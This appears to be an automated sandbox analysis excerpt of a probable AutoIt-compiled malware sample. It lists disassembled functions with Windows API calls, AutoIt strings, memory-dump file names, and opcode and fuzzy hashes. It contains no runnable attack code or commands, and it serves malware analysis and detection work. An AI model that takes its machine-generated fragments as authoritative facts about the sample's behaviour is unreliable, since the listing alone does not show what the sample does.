                            Function 00A51818 Relevance: .0, Instructions: 6COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                            Function 000DA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 000DA7A5
                            • DeleteObject.GDI32(00000000), ref: 000DA7B7
                            • DestroyWindow.USER32 ref: 000DA7C5
                            • GetDesktopWindow.USER32 ref: 000DA7DF
                            • GetWindowRect.USER32(00000000), ref: 000DA7E6
                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000DA927
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000DA937
                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA97F
                            • GetClientRect.USER32(00000000,?), ref: 000DA98B
                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000DA9C5
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA9E7
                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA9FA
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA05
                            • GlobalLock.KERNEL32(00000000), ref: 000DAA0E
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA1D
                            • GlobalUnlock.KERNEL32(00000000), ref: 000DAA26
                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA2D
                            • GlobalFree.KERNEL32(00000000), ref: 000DAA38
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA4A
                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0010D9BC,00000000), ref: 000DAA60
                            • GlobalFree.KERNEL32(00000000), ref: 000DAA70
                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 000DAA96
                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 000DAAB5
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAAD7
                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DACC4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 2211948467-2373415609
                            • Opcode ID: 75e418c2fc79cba1c31289c8c0c053730b57f79c119282c4218195fd039b9edd
                            • Instruction ID: 85f4e46580d9e509027aabc23baa2db167f999cf747c6162f29f0fb2415e3b46
                            • Opcode Fuzzy Hash: 75e418c2fc79cba1c31289c8c0c053730b57f79c119282c4218195fd039b9edd
                            • Instruction Fuzzy Hash: 8C028175A00215EFDB14DFA4DC89EAE7BB9FF49320F008159F945AB2A1DB709D81CB60
                            Function 000ED095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                            Download Yara Rule
                            APIs
                            • SetTextColor.GDI32(?,00000000), ref: 000ED0EB
                            • GetSysColorBrush.USER32(0000000F), ref: 000ED11C
                            • GetSysColor.USER32(0000000F), ref: 000ED128
                            • SetBkColor.GDI32(?,000000FF), ref: 000ED142
                            • SelectObject.GDI32(?,00000000), ref: 000ED151
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 000ED17C
                            • GetSysColor.USER32(00000010), ref: 000ED184
                            • CreateSolidBrush.GDI32(00000000), ref: 000ED18B
                            • FrameRect.USER32(?,?,00000000), ref: 000ED19A
                            • DeleteObject.GDI32(00000000), ref: 000ED1A1
                            • InflateRect.USER32(?,000000FE,000000FE), ref: 000ED1EC
                            • FillRect.USER32(?,?,00000000), ref: 000ED21E
                            • GetWindowLongW.USER32(?,000000F0), ref: 000ED249
                              • Part of subcall function 000ED385: GetSysColor.USER32(00000012), ref: 000ED3BE
                              • Part of subcall function 000ED385: SetTextColor.GDI32(?,?), ref: 000ED3C2
                              • Part of subcall function 000ED385: GetSysColorBrush.USER32(0000000F), ref: 000ED3D8
                              • Part of subcall function 000ED385: GetSysColor.USER32(0000000F), ref: 000ED3E3
                              • Part of subcall function 000ED385: GetSysColor.USER32(00000011), ref: 000ED400
                              • Part of subcall function 000ED385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED40E
                              • Part of subcall function 000ED385: SelectObject.GDI32(?,00000000), ref: 000ED41F
                              • Part of subcall function 000ED385: SetBkColor.GDI32(?,00000000), ref: 000ED428
                              • Part of subcall function 000ED385: SelectObject.GDI32(?,?), ref: 000ED435
                              • Part of subcall function 000ED385: InflateRect.USER32(?,000000FF,000000FF), ref: 000ED454
                              • Part of subcall function 000ED385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED46B
                              • Part of subcall function 000ED385: GetWindowLongW.USER32(00000000,000000F0), ref: 000ED480
                              • Part of subcall function 000ED385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED4A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                            • String ID:
                            • API String ID: 3521893082-0
                            • Opcode ID: bca9f4ea715db6a07a71f73a06f4dd84ef8e6fa075218e414b7b48a676319d97
                            • Instruction ID: fba20890d2e966e2fb39f56d36b62c877ca9c8b6a8ab6102a206abbc8f1a0d35
                            • Opcode Fuzzy Hash: bca9f4ea715db6a07a71f73a06f4dd84ef8e6fa075218e414b7b48a676319d97
                            • Instruction Fuzzy Hash: 67917071408341BFD7109FA4EC08E5B7BF9FB89325F104A19FAA2A61E0DBB1D984CB51
                            Function 000848C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32 ref: 00084956
                            • DeleteObject.GDI32(00000000), ref: 00084998
                            • DeleteObject.GDI32(00000000), ref: 000849A3
                            • DestroyIcon.USER32(00000000), ref: 000849AE
                            • DestroyWindow.USER32(00000000), ref: 000849B9
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 000FE179
                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000FE1B2
                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 000FE5E0
                              • Part of subcall function 000849CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00084954,00000000), ref: 00084A23
                            • SendMessageW.USER32 ref: 000FE627
                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000FE63E
                            • ImageList_Destroy.COMCTL32(00000000), ref: 000FE654
                            • ImageList_Destroy.COMCTL32(00000000), ref: 000FE65F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                            • String ID: 0
                            • API String ID: 464785882-4108050209
                            • Opcode ID: 540526675e2b3a96a9e5dd26e4ef9f2296388dac7958ff30dafc6e2fe1f196d3
                            • Instruction ID: c012b88a5482bfb4d5b227a12acf12e1c3b2ef1fa6c60358c83004fa50049e22
                            • Opcode Fuzzy Hash: 540526675e2b3a96a9e5dd26e4ef9f2296388dac7958ff30dafc6e2fe1f196d3
                            • Instruction Fuzzy Hash: 4A12AE30200246DFDBA1DF14C888BBABBE5BF44304F144569F6D9DBA62C731E985EB91
                            Function 000DA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(00000000), ref: 000DA42A
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000DA4E9
                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 000DA527
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 000DA539
                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 000DA57F
                            • GetClientRect.USER32(00000000,?), ref: 000DA58B
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 000DA5CF
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000DA5DE
                            • GetStockObject.GDI32(00000011), ref: 000DA5EE
                            • SelectObject.GDI32(00000000,00000000), ref: 000DA5F2
                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 000DA602
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000DA60B
                            • DeleteDC.GDI32(00000000), ref: 000DA614
                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000DA642
                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 000DA659
                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 000DA694
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000DA6A8
                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 000DA6B9
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 000DA6E9
                            • GetStockObject.GDI32(00000011), ref: 000DA6F4
                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000DA6FF
                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 000DA709
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 7742f7f24e2d27de9e2d8805a3368fbefaa5331860cb1809c9a60e792c715827
                            • Instruction ID: 3d78c8ce6ec600489a3702eb603781ac708318cff98bc09c03a8a672862ecd0a
                            • Opcode Fuzzy Hash: 7742f7f24e2d27de9e2d8805a3368fbefaa5331860cb1809c9a60e792c715827
                            • Instruction Fuzzy Hash: 52A1AF75A40214BFEB14DBA4DC4AFAE7BB9EF05710F008115FA14A72E1DBB0AD80CB60
                            Function 000CE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CE45E
                            • GetDriveTypeW.KERNEL32(?,0011DC88,?,\\.\,0011DBF0), ref: 000CE54B
                            • SetErrorMode.KERNEL32(00000000,0011DC88,?,\\.\,0011DBF0), ref: 000CE6B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                            • API String ID: 2907320926-4222207086
                            • Opcode ID: 699f7231233b65bd10c63a87dac630891beeee202b3b46a010b3d00b41cced8c
                            • Instruction ID: a69e64f2f04076aa8d592c758181149e6628d336639ba63535fc27a78d15c609
                            • Opcode Fuzzy Hash: 699f7231233b65bd10c63a87dac630891beeee202b3b46a010b3d00b41cced8c
                            • Instruction Fuzzy Hash: 3D510630258381EBC220EF14C891E6DB7E0BB94794F60892EF456A72D3DB70DE45DB46
                            Function 0008C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-86951937
                            • Opcode ID: c4a8c016229e88c6fd116193ef876cf242e306ab4759c4b7e7ac558194fbb889
                            • Instruction ID: 12df9b9fe49fc039f8b425df5f2a6e5c72a2b720760d1e5c652a0d7be2d30db3
                            • Opcode Fuzzy Hash: c4a8c016229e88c6fd116193ef876cf242e306ab4759c4b7e7ac558194fbb889
                            • Instruction Fuzzy Hash: D1610631644216B7EB25BAA49C82FFA33A9BF06740F040035F981A65C3EF70EA41D7B1
                            Function 000EC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 000EC598
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 000EC64E
                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 000EC669
                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 000EC925
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: 0
                            • API String ID: 2326795674-4108050209
                            • Opcode ID: 03c619286ca7fd81871c626b4700cc8e04d445ffce6b2cdb7a047920361cc1cf
                            • Instruction ID: ce967c60c6a8afc3667e5d33293df6fdb407d4a8e13027fb90a325323a346736
                            • Opcode Fuzzy Hash: 03c619286ca7fd81871c626b4700cc8e04d445ffce6b2cdb7a047920361cc1cf
                            • Instruction Fuzzy Hash: 9EF1D471208381AFF7258F15CC45FAABBE4FF49354F08052DF598A62A1C776D882DB52
                            Function 000E6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?,0011DBF0), ref: 000E6245
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                            • API String ID: 3964851224-45149045
                            • Opcode ID: 2d6616afc1a4eab0a5bbc673075a570316ec6bddfc5034494c66def5d93db06f
                            • Instruction ID: 5efb0550417b1cc5ea5fbc64fde04bea06725b33c121edeab570b922fc67f994
                            • Opcode Fuzzy Hash: 2d6616afc1a4eab0a5bbc673075a570316ec6bddfc5034494c66def5d93db06f
                            • Instruction Fuzzy Hash: B8C1A5342046418FCB54EF14D451AEE77E5AFA43D0F444869B892AB397CF32ED0ACB82
                            Function 000ED385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000012), ref: 000ED3BE
                            • SetTextColor.GDI32(?,?), ref: 000ED3C2
                            • GetSysColorBrush.USER32(0000000F), ref: 000ED3D8
                            • GetSysColor.USER32(0000000F), ref: 000ED3E3
                            • CreateSolidBrush.GDI32(?), ref: 000ED3E8
                            • GetSysColor.USER32(00000011), ref: 000ED400
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED40E
                            • SelectObject.GDI32(?,00000000), ref: 000ED41F
                            • SetBkColor.GDI32(?,00000000), ref: 000ED428
                            • SelectObject.GDI32(?,?), ref: 000ED435
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 000ED454
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED46B
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000ED480
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED4A8
                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000ED4CF
                            • InflateRect.USER32(?,000000FD,000000FD), ref: 000ED4ED
                            • DrawFocusRect.USER32(?,?), ref: 000ED4F8
                            • GetSysColor.USER32(00000011), ref: 000ED506
                            • SetTextColor.GDI32(?,00000000), ref: 000ED50E
                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000ED522
                            • SelectObject.GDI32(?,000ED0B5), ref: 000ED539
                            • DeleteObject.GDI32(?), ref: 000ED544
                            • SelectObject.GDI32(?,?), ref: 000ED54A
                            • DeleteObject.GDI32(?), ref: 000ED54F
                            • SetTextColor.GDI32(?,?), ref: 000ED555
                            • SetBkColor.GDI32(?,?), ref: 000ED55F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1996641542-0
                            • Opcode ID: e371cec0a331b38b689f85960304a5bab6310b6a34a9e9db1f78693e2b440205
                            • Instruction ID: 680b7f4283d84854b19cf6f05092a00c3bac2f5cada7806e450bd02cc7dd5c17
                            • Opcode Fuzzy Hash: e371cec0a331b38b689f85960304a5bab6310b6a34a9e9db1f78693e2b440205
                            • Instruction Fuzzy Hash: 95512E71900208AFDF109FA5EC48EAE7BB9FB48320F104515FA55AB2A1D7B59A80DF50
                            Function 000EB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000EB5C0
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB5D1
                            • CharNextW.USER32(0000014E), ref: 000EB600
                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000EB641
                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000EB657
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB668
                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000EB685
                            • SetWindowTextW.USER32(?,0000014E), ref: 000EB6D7
                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000EB6ED
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 000EB71E
                            • _memset.LIBCMT ref: 000EB743
                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000EB78C
                            • _memset.LIBCMT ref: 000EB7EB
                            • SendMessageW.USER32 ref: 000EB815
                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 000EB86D
                            • SendMessageW.USER32(?,0000133D,?,?), ref: 000EB91A
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 000EB93C
                            • GetMenuItemInfoW.USER32(?), ref: 000EB986
                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000EB9B3
                            • DrawMenuBar.USER32(?), ref: 000EB9C2
                            • SetWindowTextW.USER32(?,0000014E), ref: 000EB9EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                            • String ID: 0
                            • API String ID: 1073566785-4108050209
                            • Opcode ID: 435b33e4139a1fde4da32ae68677519759b369fcd3b5e6c6902aafc785887349
                            • Instruction ID: 2135a49c822803eb3d087bfa02bd5d97436c22cecf9c6a4bc3d8527d5cfd80fe
                            • Opcode Fuzzy Hash: 435b33e4139a1fde4da32ae68677519759b369fcd3b5e6c6902aafc785887349
                            • Instruction Fuzzy Hash: 50E17E75900258AFDF209F96CC84EEF7BB8FF05710F14815AF959AA191DB748A81CF60
                            Function 000E744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 000E7587
                            • GetDesktopWindow.USER32 ref: 000E759C
                            • GetWindowRect.USER32(00000000), ref: 000E75A3
                            • GetWindowLongW.USER32(?,000000F0), ref: 000E7605
                            • DestroyWindow.USER32(?), ref: 000E7631
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000E765A
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000E7678
                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 000E769E
                            • SendMessageW.USER32(?,00000421,?,?), ref: 000E76B3
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 000E76C6
                            • IsWindowVisible.USER32(?), ref: 000E76E6
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 000E7701
                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 000E7715
                            • GetWindowRect.USER32(?,?), ref: 000E772D
                            • MonitorFromPoint.USER32(?,?,00000002), ref: 000E7753
                            • GetMonitorInfoW.USER32 ref: 000E776D
                            • CopyRect.USER32(?,?), ref: 000E7784
